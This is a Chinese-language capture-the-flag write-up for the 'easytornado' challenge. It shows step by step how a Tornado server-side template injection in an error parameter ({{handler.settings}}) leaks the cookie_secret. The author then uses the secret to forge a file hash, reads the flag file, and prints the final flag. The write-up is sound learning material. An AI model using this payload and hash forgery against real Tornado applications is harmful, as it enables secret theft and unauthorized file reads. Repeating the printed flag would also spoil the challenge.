easytornado
题目描述:Tornado 框架
打开网页,发现有三个文件/flag.txt,/welcome.txt,/hints.txt
打开任意一个文件发现网址格式类似于这样:http://220.249.52.133:35276/file?filename=xxx&filehash=xxx
打开/flag.txt提示flag在/fllllllllllllag里
打开/hints.txt提示filehash是这样得到的:md5(cookie_secret+md5(filename))
打开welcome.txt提示render,即渲染,可能是SSTI
直接输入http://220.249.52.133:35276/file?filename=/fllllllllllllag,跳转到http://220.249.52.133:35276/error?msg=Error
尝试http://220.249.52.133:35276/error?msg={{7}},回显7
尝试http://220.249.52.133:35276/error?msg={{7*7}},回显ORZ,应该是运算符被过滤
可以用handler.settings获得Tornado的cookie
尝试http://220.249.52.133:35276/error?msg={{handler.settings}},获得cookie_secret:5286b756-16e4-4eaa-81dc-ea015da3a90f
然后按照提示得到filehash,md5(/fllllllllllllag)=3bf9f6cf685a6dd8defadabfb41a03a1,md5(5286b756-16e4-4eaa-81dc-ea015da3a90f3bf9f6cf685a6dd8defadabfb41a03a1)=e48d9e63c7d18f9743e70cb0ca341a92
则访问http://220.249.52.133:35276/file?filename=/fllllllllllllag&filehash=e48d9e63c7d18f9743e70cb0ca341a92得到flag:
flag{3f39aea39db345769397ae895edb9c70}